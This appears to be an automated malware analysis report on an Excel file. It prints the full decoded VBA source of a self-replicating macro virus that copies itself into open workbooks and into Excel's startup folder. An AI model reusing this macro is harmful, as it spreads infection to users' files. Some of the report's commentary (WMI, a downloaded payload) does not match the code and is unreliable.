Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a7066a607b4ac044…

MALICIOUS

Office (OLE)

Size: 24.5 KB
Created: 1999-10-01 18:41:06
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 121dbe508f688959971aee02b71fb053
SHA-1: 5d3ac15e26cde3ea7a4822618c78c6ee0dd47d6d
SHA-256: a7066a607b4ac044d41a00596bd0b99095c2c50ec3d14140c18f36cda9dc6182
Risk Score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1546.003 Event Triggered Execution: Windows Management Instrumentation

The critical heuristic OLE_VBA_WBOPEN indicates the presence of a Workbook_Open macro, which runs automatically when the Excel file is opened. The VBA code reads the source of the first code module of its own workbook, replaces the first code module of the active workbook with that source, and re-saves the active workbook under its existing name. It then saves the workbook as 'Book1.xls' in the application's startup path, likely to establish persistence or facilitate the execution of a downloaded payload. The ClamAV detection further confirms the malicious nature of the file.

Heuristics 3

  • ClamAV: Win.Trojan.W-420 (severity: critical, ID: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.W-420
  • VBA macros detected (severity: medium, ID: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Workbook_Open macro (severity: high, ID: OLE_VBA_WBOPEN)
    Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1482 bytes
SHA-256: 00ff5a71cfb0dec9cd7c5404d60104fd1956695eb50b0c8e3446de3e305310ad
Detection: ClamAV: Win.Trojan.W-420
Obfuscation or payload: unlikely

Preview of the extracted script (first 1,000 lines):

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
V1 = ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
With ActiveWorkbook.VBProject.VBComponents.Item(1).CodeModule
.DeleteLines 1, .CountOfLines
.AddFromString V1
End With
ActiveWorkbook.SaveAs FileName:=ActiveWorkbook.FullName
ActiveWorkbook.SaveAs FileName:=Application.StartupPath & "Book1.xls"
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True